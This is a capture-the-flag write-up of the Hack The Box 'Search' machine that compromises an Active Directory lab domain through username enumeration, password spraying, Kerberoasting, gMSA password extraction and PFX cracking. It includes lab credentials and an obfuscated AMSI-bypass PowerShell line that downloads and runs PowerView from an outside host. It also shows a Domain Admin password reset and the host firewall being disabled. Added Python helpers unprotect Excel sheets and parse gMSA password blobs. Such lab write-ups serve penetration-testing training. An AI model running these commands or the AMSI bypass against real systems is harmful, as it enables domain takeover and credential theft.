Pentest Everything

Search

https://app.hackthebox.com/machines/Search

Nmap

sudo nmap 10.10.11.129 -p- -sS -sV

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-07-05 18:32:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      Microsoft IIS httpd 10.0
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: search.htb0., Site: Default-First-Site-Name)
8172/tcp  open  ssl/http      Microsoft IIS httpd 10.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
49736/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESEARCH; OS: Windows; CPE: cpe:/o:microsoft:windows

Kerbrute

Starting out, we hit some valid usernames when running kerbrute against the target system. I was unable to proceed with the found usernames, so we move on to enumerating the web server.

kerbrute userenum '/usr/share/seclists/Usernames/xato-net-10-million-usernames.txt' --dc 10.10.11.129 --domain search.htb   

Basic reconnaissance against the web server shows some team members who may have valid accounts within Active Directory.

The potential users have been listed below.

Keely Lyons
Dax Santiago
Sierra Frye
Kyla Stewart
Kaiara Spencer
Dave Simpson
Ben Thompson
Chris Stewart

As we are not aware of the naming convention used for Active Directory user accounts we need to generate a list of possible combinations.

Username Generation

Username generation can be completed with usernamer. usernamer takes an input list of full names and generates username combinations based on likely naming conventions.

python2 usernamer.py -f usernames -l >> usernames_AD.txt

After generating the usernames we run the new list through kerbrute, which reveals the naming convention to be Firstname.Surname.

kerbrute userenum ~/Desktop/usernames_AD.txt --dc '10.10.11.129' --domain 'search.htb'

However, after multiple brute force attempts I was unable to proceed.
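The same candidate generation done by hand, as an added example that is not part of the original writeup nor the usernamer project's code. It builds a kerbrute wordlist from the team names listed above in the sAMAccountName conventions most often seen in AD, and, once kerbrute has reported which candidates exist, infers which convention the domain uses. The convention labels and the two confirmed users in the demo call are assumptions for illustration.

```python
# Added example, not part of the original writeup or of the usernamer project:
# generate candidate AD usernames from the full names found on the web server in
# the sAMAccountName conventions most often seen, and, once kerbrute reports
# which candidates exist, infer the convention the domain uses.
import re
from typing import Dict, Iterable, List, Set

# Team members listed on the site (taken from the writeup).
TEAM = ["Keely Lyons", "Dax Santiago", "Sierra Frye", "Kyla Stewart",
        "Kaiara Spencer", "Dave Simpson", "Ben Thompson", "Chris Stewart"]

# Common naming conventions; f = first name, l = last name (both lower-case).
CONVENTIONS = {
    "first.last": lambda f, l: f"{f}.{l}",
    "flast":      lambda f, l: f"{f[0]}{l}",
    "f.last":     lambda f, l: f"{f[0]}.{l}",
    "firstl":     lambda f, l: f"{f}{l[0]}",
    "firstlast":  lambda f, l: f"{f}{l}",
    "first_last": lambda f, l: f"{f}_{l}",
    "first-last": lambda f, l: f"{f}-{l}",
    "lastf":      lambda f, l: f"{l}{f[0]}",
    "last.first": lambda f, l: f"{l}.{f}",
    "first":      lambda f, l: f,
}


def candidates(full_name: str) -> Dict[str, str]:
    """Map convention label -> username for one person; {} if no first+last name."""
    parts = re.findall(r"[a-z]+", full_name.lower())  # drops accents, hyphens, dots
    if len(parts) < 2:
        return {}
    first, last = parts[0], parts[-1]
    return {label: fmt(first, last) for label, fmt in CONVENTIONS.items()}


def generate_wordlist(names: Iterable[str]) -> List[str]:
    """Deduplicated, order-preserving list to feed to kerbrute userenum."""
    seen: Set[str] = set()
    out: List[str] = []
    for name in names:
        for user in candidates(name).values():
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


def detect_convention(names: Iterable[str], valid_users: Iterable[str]) -> Set[str]:
    """Return the conventions that account for every username kerbrute confirmed."""
    valid = {u.lower() for u in valid_users}
    if not valid:
        return set()
    per_person = [c for c in (candidates(n) for n in names) if c]
    return {label for label in CONVENTIONS
            if valid <= {c[label] for c in per_person}}


if __name__ == "__main__":
    with open("usernames_AD.txt", "w") as fh:
        fh.write("\n".join(generate_wordlist(TEAM)) + "\n")
    # Then: kerbrute userenum usernames_AD.txt --dc 10.10.11.129 --domain search.htb
    # The two confirmed users below are assumed for the demo.
    print(detect_convention(TEAM, ["keely.lyons", "dax.santiago"]))  # {'first.last'}
```

Once the convention is known, every further name found (the "Hope Sharp" from the image later on) can be turned into a single username instead of ten guesses.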

Information within images

Heading back over to the web server, we find that one of the displayed images contains credential information for an internal user.

Keywords identified are "Hope Sharp" and "IsolationIsKey?". As we know the naming convention for this domain, we try the potential credentials hope.sharp:IsolationIsKey? with crackmapexec.

crackmapexec smb '10.10.11.129' -u hope.sharp -p 'IsolationIsKey?' -d 'search.htb'

Service Principal Names

With valid credentials we check for user accounts that have SPNs set using Impacket's GetUserSPNs.py and request a TGS for each (Kerberoasting), which gives us a krb5tgs hash for the user web_svc.

GetUserSPNs.py search.htb/hope.sharp:'IsolationIsKey?' -dc-ip '10.10.11.129' -request

Using hashcat mode 13100 (Kerberos 5 TGS-REP, etype 23) we soon crack the hash with the rockyou.txt wordlist.

hashcat -a 0 -m 13100 hash.hash /usr/share/wordlists/rockyou.txt 

Credentials: web_svc:@3ONEmillionbaby

Password Spraying

I tested for some time with the web_svc account and was unable to progress anywhere meaningful. Spraying its password against all known users (enumerated earlier with the valid credentials) we get a hit for edgar.jacobs: a case of password reuse across accounts.

crackmapexec smb '10.10.11.129' -u ~/Desktop/users -p '@3ONEmillionbaby' --continue-on-success

Credentials: edgar.jacobs:@3ONEmillionbaby

Protected Worksheets

Using these credentials against SMB with smbmap we recursively list all available shares.

smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R

Under Edgar's Desktop in the RedirectedFolders share we see "Phishing_Attempt.xlsx".

Using smbmap we download the file of interest.

smbmap -H '10.10.11.129' -u 'edgar.jacobs' -p '@3ONEmillionbaby' -d 'search.htb' -R -A xlsx

Opening Phishing_Attempt.xlsx we see that on the worksheet "Passwords" column C is not visible, and that the worksheet is protected so the column cannot simply be unhidden.

There are various ways of removing worksheet protection when the password is not known. Worksheet protection is a UI lock rather than encryption: the cell values are stored in plaintext inside the workbook XML, so the protection can be bypassed without the password.

https://www.ablebits.com/office-addins-blog/protect-unprotect-excel-sheet-password/#unlock-excel-spreadsheet-vba

I opted for the copy and paste method: select all cells on the protected sheet and paste them into a new, unprotected worksheet, which brings the hidden column of passwords along with it.
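The same bypass done directly on the file, as an added example that is not from the writeup or the linked article. An .xlsx is a zip of XML parts; "Protect Sheet" only stores a sheetProtection element carrying a password hash that Excel checks in the UI, so deleting that element and the hidden flags on the column definitions yields an unprotected workbook without knowing the password. The sample workbook is constructed inline and is not the real Phishing_Attempt.xlsx; its hash and salt values are placeholders. A workbook saved with "Encrypt with Password" is a different, really encrypted container, and this does not apply to it (office2john and hashcat do).

```python
# Added example, not from the original writeup: remove worksheet protection and
# un-hide columns/rows by rewriting the sheet XML inside an .xlsx. The workbook
# is a zip of XML parts and "Protect Sheet" only stores a <sheetProtection/>
# element (a password hash Excel checks in the UI); the cell values stay in
# plaintext. A file saved with "Encrypt with Password" is a different, really
# encrypted container and needs office2john/hashcat instead.
import io
import re
import zipfile
from typing import Dict, Tuple

SHEET_PART = re.compile(r"^xl/worksheets/sheet\d+\.xml$")
PROTECTION = re.compile(
    r"<sheetProtection\b[^>]*?/>|<sheetProtection\b[^>]*>.*?</sheetProtection>", re.S)
HIDDEN_ATTR = re.compile(r'\s+hidden="(?:1|true)"')  # on <col>/<row> elements


def unprotect_sheet_xml(xml: str) -> Tuple[str, Dict[str, int]]:
    """Strip the protection element and hidden flags from one worksheet part."""
    xml, n_prot = PROTECTION.subn("", xml)
    xml, n_hidden = HIDDEN_ATTR.subn("", xml)
    return xml, {"protections_removed": n_prot, "hidden_attrs_removed": n_hidden}


def unprotect_xlsx(data: bytes) -> Tuple[bytes, Dict[str, Dict[str, int]]]:
    """Return a new .xlsx with every sheet unprotected, plus a per-sheet report."""
    report: Dict[str, Dict[str, int]] = {}
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(data)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            payload = src.read(info.filename)
            if SHEET_PART.match(info.filename):
                xml, stats = unprotect_sheet_xml(payload.decode("utf-8"))
                payload, report[info.filename] = xml.encode("utf-8"), stats
            dst.writestr(info.filename, payload)  # other parts are copied through untouched
    return out.getvalue(), report


def read_sheet_xml(data: bytes, part: str = "xl/worksheets/sheet1.xml") -> str:
    """Pull one XML part back out of an .xlsx (used to inspect the result)."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        return z.read(part).decode("utf-8")


# Constructed minimal workbook (not a real capture): one sheet with a hidden
# column C and SHA-512 sheet protection; hash and salt values are placeholders.
_SHEET1 = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    '<cols><col min="3" max="3" width="30" hidden="1" customWidth="1"/></cols>'
    '<sheetData><row r="1">'
    '<c r="A1" t="inlineStr"><is><t>user</t></is></c>'
    '<c r="C1" t="inlineStr"><is><t>password</t></is></c>'
    '</row></sheetData>'
    '<sheetProtection algorithmName="SHA-512" hashValue="c29tZWhhc2g=" '
    'saltValue="c2FsdA==" spinCount="100000" sheet="1" objects="1" scenarios="1"/>'
    '</worksheet>'
)


def build_sample_xlsx() -> bytes:
    """Assemble the constructed workbook as an in-memory zip."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")  # placeholder parts, left untouched
        z.writestr("xl/workbook.xml", "<workbook/>")
        z.writestr("xl/worksheets/sheet1.xml", _SHEET1)
    return buf.getvalue()


if __name__ == "__main__":
    fixed, report = unprotect_xlsx(build_sample_xlsx())
    print(report)  # {'xl/worksheets/sheet1.xml': {'protections_removed': 1, 'hidden_attrs_removed': 1}}
    with open("Phishing_Attempt_unprotected.xlsx", "wb") as fh:
        fh.write(fixed)
```

On a real file, run unprotect_xlsx over the downloaded workbook bytes and open the result; Excel and LibreOffice accept the rewritten sheet because nothing else in the package references the removed element.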

Password Spraying #2

Spraying the password list against the list of known users we get a hit for Sierra.Frye.

Credentials:

sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18

Bloodhound

With valid credentials we can perform BloodHound collection remotely with BloodHound.py.

python3 bloodhound.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -ns '10.10.11.129' -d 'search.htb'

After collection finishes the results are uploaded to the BloodHound GUI and reviewed. We see that Sierra is a member of "Remote Management Users".

No luck though: WinRM (TCP 5985) does not appear in the port scan, so it is not exposed externally.

gMSA Password

Further enumeration shows that effective members of the group ITSEC can read the gMSA password of BIR-ADFS-GMSA$ (the ReadGMSAPassword edge in BloodHound).

gMSADumper is a Python script that reads the msDS-ManagedPassword attribute over LDAP. The DC only returns this attribute over a connection with confidentiality (LDAPS, or LDAP with NTLM/Kerberos sealing) and only to principals allowed by the account's msDS-GroupMSAMembership; the value is a MSDS-MANAGEDPASSWORD_BLOB structure, from which the tool extracts the current password and computes its NT hash.

python3 gMSADumper.py -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d search.htb -l 10.10.11.129

After successfully reading the gMSA password we are left with its NT hash (the password itself is a long random UTF-16 string that is not typeable, so the hash is what gets used, via pass-the-hash): BIR-ADFS-GMSA$:::e1e9fd9e46d0d747e1595167eedcec0f

However, from here I was unable to proceed with the credentials.
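What gMSADumper actually does with the attribute, as an added example that is not the writeup's or the tool's code: a parser for the MSDS-MANAGEDPASSWORD_BLOB (MS-ADTS 2.2.19) returned in msDS-ManagedPassword, with the NT hash derived the same way (MD4 over the UTF-16LE password bytes). The blob is constructed inline with the password "password" so the well-known NT hash is recognisable; a real gMSA password is a long random UTF-16 string, which is why only the hash is usable. MD4 is implemented in the block because OpenSSL 3 builds of hashlib often refuse it; the interval values in the demo are assumptions.

```python
# Added example, not gMSADumper's own code: parse the MSDS-MANAGEDPASSWORD_BLOB
# that the DC returns in msDS-ManagedPassword and derive the NT hash from it.
import struct
from typing import Any, Dict, Optional

_MASK = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often disabled under OpenSSL 3."""
    def F(x, y, z): return (x & y) | (~x & z)
    def G(x, y, z): return (x & y) | (x & z) | (y & z)
    def H(x, y, z): return x ^ y ^ z
    def rotl(x, s): return ((x << s) | (x >> (32 - s))) & _MASK
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (8 * len(data)) & 0xFFFFFFFFFFFFFFFF)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2 = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(48):
            if i < 16:
                f, k, s, add = F(b, c, d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                f, k, s, add = G(b, c, d), r2[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                f, k, s, add = H(b, c, d), r3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + f + X[k] + add) & _MASK, s), b, c
        h = [(x + y) & _MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password_utf16le: bytes) -> str:
    """NT hash = MD4 of the UTF-16LE password bytes, hex encoded."""
    return md4(password_utf16le).hex()


# Version, Reserved, Length, CurrentPasswordOffset, PreviousPasswordOffset,
# QueryPasswordIntervalOffset, UnchangedPasswordIntervalOffset (all little-endian).
HEADER = struct.Struct("<HHIHHHH")


def _utf16z(buf: bytes, off: int) -> bytes:
    """Read a UTF-16LE string terminated by a 0x0000 unit, returning the raw bytes."""
    end = off
    while True:
        if end + 2 > len(buf):
            raise ValueError("unterminated UTF-16 string in blob")
        if buf[end:end + 2] == b"\x00\x00":
            return buf[off:end]
        end += 2


def parse_managed_password_blob(blob: bytes) -> Dict[str, Any]:
    """Decode the blob; passwords are kept as raw bytes since they need not be valid text."""
    version, _reserved, length, cur_off, prev_off, q_off, u_off = HEADER.unpack_from(blob, 0)
    if version != 1 or length != len(blob):
        raise ValueError("not a MSDS-MANAGEDPASSWORD_BLOB")
    current = _utf16z(blob, cur_off)
    previous = _utf16z(blob, prev_off) if prev_off else None
    return {
        "current_password": current,           # raw UTF-16LE; random and unprintable on a real gMSA
        "current_nt_hash": nt_hash(current),
        "previous_nt_hash": nt_hash(previous) if previous is not None else None,
        "query_interval": struct.unpack_from("<Q", blob, q_off)[0],      # 100ns units
        "unchanged_interval": struct.unpack_from("<Q", blob, u_off)[0],  # 100ns units
    }


def build_managed_password_blob(current: bytes, previous: Optional[bytes] = None,
                                query_interval: int = 0, unchanged_interval: int = 0) -> bytes:
    """Constructed blob for testing; on a real domain the DC builds this structure."""
    body = current + b"\x00\x00"
    cur_off, prev_off = HEADER.size, 0
    if previous is not None:
        prev_off = cur_off + len(body)
        body += previous + b"\x00\x00"
    body += b"\x00" * ((-len(body)) % 8)  # pad so the interval fields are 8-byte aligned
    q_off = cur_off + len(body)
    u_off = q_off + 8
    header = HEADER.pack(1, 0, u_off + 8, cur_off, prev_off, q_off, u_off)
    return header + body + struct.pack("<QQ", query_interval, unchanged_interval)


if __name__ == "__main__":
    demo = build_managed_password_blob("password".encode("utf-16-le"),
                                       previous="old".encode("utf-16-le"),
                                       query_interval=30 * 24 * 3600 * 10**7)  # assumed 30 days
    info = parse_managed_password_blob(demo)
    print("BIR-ADFS-GMSA$:::" + info["current_nt_hash"])  # 8846f7eaee8fb117ad06bdd830b7586c
```

The hex value is what goes into crackmapexec's -H option (with the account name including the trailing $) or into any other pass-the-hash tool; there is no point trying to type the password.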

Certificates

Going back to further enumeration, we use smbmap to list available shares with Sierra's credentials and find some certificate files within the RedirectedFolders share.

smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "p12"
smbmap -H '10.10.11.129' -u 'sierra.frye' -p '$$49=wide=STRAIGHT=jordan=28$$18' -d 'search.htb' -R -A "pfx" 

After downloading, we are prompted for a password when opening the .pfx file.

pfx2john converts the PKCS#12 file into a hash usable by john.

/usr/bin/pfx2john ~/10.10.11.129-RedirectedFolders_sierra.frye_Downloads_Backups_staff.pfx >> pfxhash.hash

Cracking the hash:

sudo john --wordlist=/usr/share/wordlists/rockyou.txt pfxhash.hash 

We can now import the certificate into Firefox. The import prompts for the PKCS#12 password, which is the one just cracked.

PowerShell Web Access

Browsing to the /staff page, the site requests a client certificate and we present the one just imported.

We are then presented with a PowerShell Web Access console. Logging in with Sierra's credentials and the computer name "research" succeeds.

User.txt

We are then able to grab the user.txt flag.

Lateral Movement with PowerShell

I was unable to find a method of privilege escalation as Sierra, and BloodHound was not providing any paths for potential escalation.

I decided to proceed with gaining command execution as BIR-ADFS-GMSA$ using PowerShell remoting.

Even though we already have the NT hash for BIR-ADFS-GMSA$, I used the PowerShell snippet from the linked page to build a credential object straight from the readable gMSA password for use with Invoke-Command (Get-ADServiceAccount comes from the ActiveDirectory module, ConvertFrom-ADManagedPasswordBlob from the DSInternals module).

# Read the msDS-ManagedPassword blob as a principal allowed to retrieve it, then decode it
$mp = (Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword').'msDS-ManagedPassword'
$cred = new-object system.management.automation.PSCredential "search.htb\BIR-ADFS-GMSA",(ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
Invoke-Command -ComputerName $env:computername -Credential $cred -ScriptBlock {whoami}

Invoke-ACLScanner

Whilst working as BIR-ADFS-GMSA$ I then bypassed AMSI and ran PowerView's Invoke-ACLScanner to look for ACLs of interest.

Invoke-Command -computername research -Credential $cred -ScriptBlock {S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} ); iex (iwr -usebasicparsing http://10.10.14.8:8000/powerview.ps1);Invoke-ACLScanner -ResolveGUIDs | out-file c:\redirectedfolders\Output.txt }

Looking through the results we see that BIR-ADFS-GMSA$ has GenericAll over the user Tristan.Davies, who is a Domain Administrator. Oddly, this attack path was not picked up by BloodHound.

As we have GenericAll over Tristan.Davies we can reset the user's password without knowing the current one.

Invoke-Command -computername research -Credential $cred -ScriptBlock {net user /domain tristan.davies Password123}

To gain a full shell I disabled the host firewall with the newly acquired Domain Administrator account, exposing WinRM. This is the noisy option; on a real engagement a single allow rule for TCP 5985 would be the lighter touch.

crackmapexec smb '10.10.11.129' -u 'Tristan.Davies' -p 'Password123' -d 'search.htb'  -x 'netsh advfirewall set allprofiles state off'

Check that WinRM (WS-Man, TCP 5985) is now reachable with Nmap.

root.txt

Then log in with Evil-WinRM.

evil-winrm -i '10.10.11.129' -u 'Tristan.Davies' -p 'Password123'

Then grabbed the root.txt flag.

References:

usernamer: https://github.com/jseidl/usernamer
BloodHound.py: https://github.com/fox-it/BloodHound.py
gMSADumper: https://github.com/micahvandeusen/gMSADumper
ReadGMSAPassword (The Hacker Recipes): https://www.thehacker.recipes/ad/movement/dacl/readgmsapassword